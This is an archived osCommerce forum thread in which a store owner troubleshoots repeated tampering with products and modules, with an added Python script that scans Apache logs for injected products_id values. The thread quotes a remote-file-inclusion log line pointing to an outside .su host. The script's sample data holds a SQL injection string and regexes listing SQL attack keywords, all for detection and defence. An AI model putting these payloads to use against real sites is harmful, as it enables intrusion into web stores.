
Archived

This topic is now archived and is closed to further replies.

dfy-pro

After 3 great years, I'm being hacked!

45 posts in this topic

Hi Guys,

I have no one else to contact on this matter. I tried everything: changed passwords, usernames, even the server (not the host yet, but that's the next step).

 

Someone is changing the payment and shipping modules and enabling/disabling products on my live site. These weird things started happening about a week and a half ago and I simply don't know what to do.

 

I have osCommerce 2.2-MS2 installed (the admin section is protected). It worked fine for about 3 years...

 

Does anyone have any idea what to do?


Quick question: do you only access from home, or do you check your site at work or elsewhere also?


Ask your hosting company to provide you with a log of admin access.

 

If it's done through admin, that will be known.

 

There is a "Monitor Your Site" contribution. Monitor admin.

Also check the admin log.

 

Your hosting company has to assist you if some hacking happens; you are paying for that.

 

Satish


Also, if you do have a static IP, then through .htaccess set it so that only the PC with that IP has the right to access admin.

 

Satish


Thanks for the replies.

 

I accessed the admin section from a couple of places including work and home. I also gave access to a programmer from India, but that was a professional company with a 100% good feedback on elance.com.

 

However, after yesterday's post, I was talking with my host over the phone and he monitored the admin's log and didn't find any suspicious act over there.

 

So he suggested I create a new DB, import the previous one and create a new user and password. And that's what I did 12 hours ago. I checked every detail of the admin before going to sleep. I woke up in the morning, and again, someone had played with the enable/disable of all my products.

 

Here are all the details:

- I'm hosting on hostgator.com

- I have two accounts. One is used for development on a mirror site. (different DB, different user and PW, different user and PW to admin section)

- On my live site, I deleted the 'infected' DB, created a new one with new user and PW.

- Admin section is password protected, but is being accessed through HTTP, not HTTPS.

- No other IPs are accessing the admin section. (I monitored it through the admin's log + I placed a statcounter code on each page.)

- The behavior of the hacker is very weird. The only thing he changes is the enable/disable of products and the payment and shipping modules.

 

Any ideas?


It depends how technical you are and how willing your host is to work with you.

 

Apache logs this stuff.

 

Depending on how technical you are, I suggest installing mod_security, but make sure you understand any implications for the URL and how it will affect your store's functionality.

 

As others have mentioned, set an .htaccess file for admin access to only accept IPs that YOU set. This has nothing to do with osCommerce, but is an Apache-related file.

 

Have your host change the command-line (root) access password to your account.

 

Try setting up another oscommerce admin account and deleting the old one.

 

There is no such thing as an infected database. A database contains records. If those records have been changed surreptitiously, that is an access control issue, not a database issue. The database has records that control who can access it, so those might be worth looking at as well.

 

Do you keep backups of your database? If not, it's a good time to start.

 

I would have given them access to a test site, have them make changes to that then YOU replicate those changes to your site.


I have the same problem; me too, after three years I got hacked. How can this happen suddenly?

 

Did you solve it already?

 

They did not change my database but the index.html keeps changing. And some other root files.

 

Also, my admin directory was not password protected anymore.

 

Dubwize


Yes. I solved the problem.

 

My problem was that mod_security was off.

Go to the .htaccess file and change:

 

<IfModule mod_security.c>
  # Turn on mod_security filtering.
  # (These are mod_security 1.x directives; 2.x uses SecRuleEngine /
  # SecRequestBodyAccess in the server config and does not accept them in .htaccess.)
  SecFilterEngine On

  # The below probably isn't needed,
  # but better safe than sorry.
  SecFilterScanPOST On
</IfModule>

 

---------------------------------------

Also, I found that there was actually a MySQL injection bug fix in the new osC 2.2 RC2 (I was using MS2), but since I don't use the index file, I don't think that was my problem.

 

Good luck!


OK, I'm very sad to say that I'm being hacked again.

Now even with mod_security on!

 

 

My hosting provider said my software is "fundamentally flawed".

 

I did notice that there is a new version of osCommerce, RC1, but in the update doc they mentioned the MySQL injection fix was only in the index.php file (and I'm not even using this file...).

Does anybody have any idea how this can happen?

 

They are going to the product_info.php page, replacing the product name with their site, and getting into the SQL!

I seriously need to enable products every day after they have disabled them at night. this is totally crazy!

What is your URL?


HostGator is a shared hosting provider?

A lot of the hacks that happen when hosts blame software are because another user got hacked through insecure scripts.

 

Not saying that is definitely the case here, but as you can tell from the number of messages and users on these boards, a lot of people use osC. If it were "fundamentally flawed" I would think all of us would have our shops continuously hacked. I've caught many attempts, but so far none have been successful.

 

You may also want to look at your Indian programmer's code. They could have unknowingly used code full of security holes. When I first started using osCommerce I paid a programmer to write the code I needed, but none of the inputs had security filters: data was being passed to my database without being checked!

 

And check what contributions you use. I am pretty sure old versions of SuperTracker have a security flaw that can be executed on the product page if it's unpatched.

Thank you eww! This is very helpful.

 

As far as the Indian programmers, I think they didn't touch the product_info.php page, but I installed the product option type contribution about two years ago...

 

I think I'm going to try putting the latest version of the contribution on a fresh osC version, and if that's not going to work, I'll switch hosting.

 

I will update you soon. Thanks again.


If you read that topic about the new osC version: if you have a modified store, you may break it by upgrading.

 

I have dozens of contributions and custom code I did myself on my shop. I did not upgrade, but I applied the security patches (I believe there are only 2: one for currency and another sorting injection fix).

 

Before you apply the fixes, test the currency exploit and see if it's possible they gained entry through that exploit.

 

 

I don't know much about hacking, but they may not have needed access to the product page to impact the product table. There are a lot of calls in osC that pull product info.

Definitely check any custom code you're using, and don't forget to post back when you know what happened, so the rest of us can secure our scripts if we're using the same code as you :)

If you download and unzip RC1, you will see upgrade.html, which contains all of the bug fixes and improvements (definitely more than 2). They will not break your store.


Posted by a team member: http://forums.oscommerce.com/index.php?sho...8335&st=220 (top post should be from Jan Zonjee):

There was at least one for an SQL injection on the sort functions on index.php. There is a bugfix for currencies though in RC1:

 

 

And posted by Vger (whom I consider to be very knowledgeable and helpful on the osC boards):

I'm sorry if this sounds harsh, but for website owners to upgrade to RC1 when they have live shops already modified with contributions is just asking for trouble.

 

If your shop is modified - DON'T DO IT! Wait until updates are posted for the contribs you've installed which make them compatible with RC1.

 

If you must do it - then do it on a test version first, either offline or installed in a folder on your hosting.

 

Vger

Yes Jan and Vger are very knowledgeable, but I have already done it without problems. As I said, it is not now an RC1 store, it is patched to RC1. Also, I did not do the state names improvement because I use country and state selector.


OK, maybe you don't use the same contributions that the other people use who have had problems installing RC1 :)

I, for one, never upgrade software unless absolutely necessary (such as for security fixes). Why fix something that isn't broken?

Maybe the over 100 addons I have aren't common, but I do agree with "why fix something that isn't broken". That is why I do update my addons for no reason.

 

Anyway, this is all off topic and not helping with the original post.


Sure it's on topic; it can help others decide whether they need the full package for RC1 or not. The overall topic in the news forum was mostly off topic, but was of a great deal of help to me; it helped me decide against the full install.

 

If one is not familiar with PHP and has a contribution that is using part of the code that the install instructions say to modify, they are going to encounter problems.

Yes, I did not do the full install either, just did the patches.

 

They will have problems when one contribution uses part of the code from another and they have to merge the addons. I had no problems with the updates clashing with addons.

 

OK, still waiting for the URL so I can see what the hacker did.


Hi

 

It is fine changing files etc., but one thing has never been asked in this topic.

 

 

Does anyone else in your home have access to your computer? This could be a simple reason: someone at home could be accessing your files when you are not around and changing these.


1. If on a shared server do not set "Use Cache" to true. What you may be seeing as a hack could simply be the details of another website appearing on your site by virtue of using a server-wide cache folder aliased to the cache folder on every site on the server. Meaning - your cache folder is actually linked to the server-wide cache folder, allowing other sites Categories/Products to appear on your website.

 

2. If using MS2 then it should be enough that you update your website with all of the latest security patches and bug fixes contained in MS2 (060817). Though not available for download from here, it is still available on Source Forge[dot]Net and other places for download.

 

3. If you have been running your osCommerce website for years without applying bug fixes and security patches, then you have only yourself to blame if you got hacked. No software is future-proof, and it does have to be kept up to date.

 

4. If your server uses cPanel as its control system then you should be aware that cPanel has no jailed root, so if one site is hacked on the server the hacker may be able to access other sites (perhaps all of them). Additionally, cPanel itself is hacked on a fairly regular basis (3-4 times per year), and when that happens the hackers can get to everything.

 

Does anyone else in your home have access to your computer

 

(5). That's not necessary if your PC has been hacked by an outside source and is under their control.

 

Vger

Vger,

What are the vulnerabilities in getting hacked (because of cPanel) on a VPS, if the cPanel update is on cron?


Thank you Vger!

 

I'm following your instructions one by one:

 

1. In the admin section, cache is set to false.

 

2. I haven't applied the update yet on my MS2. I didn't do it since I saw that the MySQL injection fix was only to the index.php file, and I'm not using this file in my system (my site starts with a simple HTML home page).

- However, I asked my programmer to update the code for me tonight. (I can't do it myself, since my system is heavily modified.)

 

4. I just bought a new hosting package on a shared server from a different hosting provider that doesn't use cPanel. For some reason, I think that's related somehow. I'm not sure.

 

HostGator provided me with the following information regarding the MySQL injection on my site:

 

'ip.--.--.ip' /product_info.php?products_id=http://mifumisokuimsedfsisumsdoklop.mail15.su/image? 200

 

I deleted product_info.php from my test site, changed the cpanel, admin and DB user passwords, but it's still going on over there.

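The log line HostGator quoted above is the kind of evidence a store owner on shared hosting can actually ask for: the raw Apache access log. The following script is an added example, not code from this thread or from osCommerce; it scans a combined-format access log for product_info.php requests whose products_id is not a well-formed osCommerce product id (an integer, optionally followed by attribute selections in the id{option_id}value_id form) and groups the hits by source IP. The sample log lines are constructed for the example (RFC 5737 documentation addresses, invented timestamps); the second line mirrors the request quoted in the post. A 200 status on such a request only shows that the script served a page, not whether the query was affected, so the real fix is validating products_id in the PHP before it reaches SQL.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample of an Apache "combined" access log. The second line mirrors
# the request HostGator quoted in the thread; the IPs are RFC 5737 documentation
# addresses, not real visitors, and the timestamps are invented.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2008:03:14:07 +0000] "GET /product_info.php?products_id=42 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2008:03:15:22 +0000] "GET /product_info.php?products_id=http://mifumisokuimsedfsisumsdoklop.mail15.su/image? HTTP/1.1" 200 7991 "-" "libwww-perl/5.805"
198.51.100.9 - - [12/Mar/2008:03:15:23 +0000] "GET /product_info.php?products_id=42%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 7991 "-" "libwww-perl/5.805"
203.0.113.8 - - [12/Mar/2008:03:16:01 +0000] "GET /product_info.php?products_id=17{3}9 HTTP/1.1" 200 8002 "-" "Mozilla/4.0"
203.0.113.7 - - [12/Mar/2008:03:17:40 +0000] "POST /admin/categories.php?action=update HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache combined LogFormat: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# A legitimate osCommerce products_id is an integer, optionally followed by
# attribute selections in the id{option_id}value_id form, e.g. 17{3}9.
SAFE_PID = re.compile(r'^\d+(\{\d+\}\d+)*$')
REMOTE_URL = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)
SQL_META = re.compile(
    r"['\"#;]|--|/\*|\b(union|select|insert|update|delete|sleep|benchmark)\b", re.I
)


def classify_products_id(value):
    """Return None for a well-formed products_id, otherwise a short reason."""
    if SAFE_PID.match(value):
        return None
    if REMOTE_URL.match(value):
        return "remote URL in products_id"
    if SQL_META.search(value):
        return "SQL metacharacters in products_id"
    return "non-numeric products_id"


def scan_log(text):
    """Return one finding per product_info.php request carrying a bad products_id."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess at the fields
        parts = urlsplit(m.group("target"))
        if parts.path != "/product_info.php":
            continue
        # parse_qs percent-decodes, so %27 is already a quote when we inspect it
        for value in parse_qs(parts.query, keep_blank_values=True).get("products_id", []):
            reason = classify_products_id(value)
            if reason:
                findings.append({
                    "ip": m.group("ip"), "time": m.group("ts"),
                    "status": int(m.group("status")),
                    "reason": reason, "value": value,
                })
    return findings


def top_sources(findings):
    """Source IPs ordered by number of suspicious requests, most active first."""
    return Counter(f["ip"] for f in findings).most_common()


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f'{f["time"]} {f["ip"]} HTTP {f["status"]}: {f["reason"]} -> {f["value"]!r}')
    print("sources:", top_sources(hits))
```

Run it against the real log with `scan_log(open("access_log").read())`; the IPs that `top_sources` puts at the top are the ones to block in .htaccess and to report to the host, and the decoded `value` field is what to hand to whoever patches product_info.php. The attribute form 17{3}9 is deliberately treated as clean so that normal "add to cart" traffic does not drown the real hits.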

Do you use On the Fly Thumbnailer? There was a vulnerability in it a few releases back.
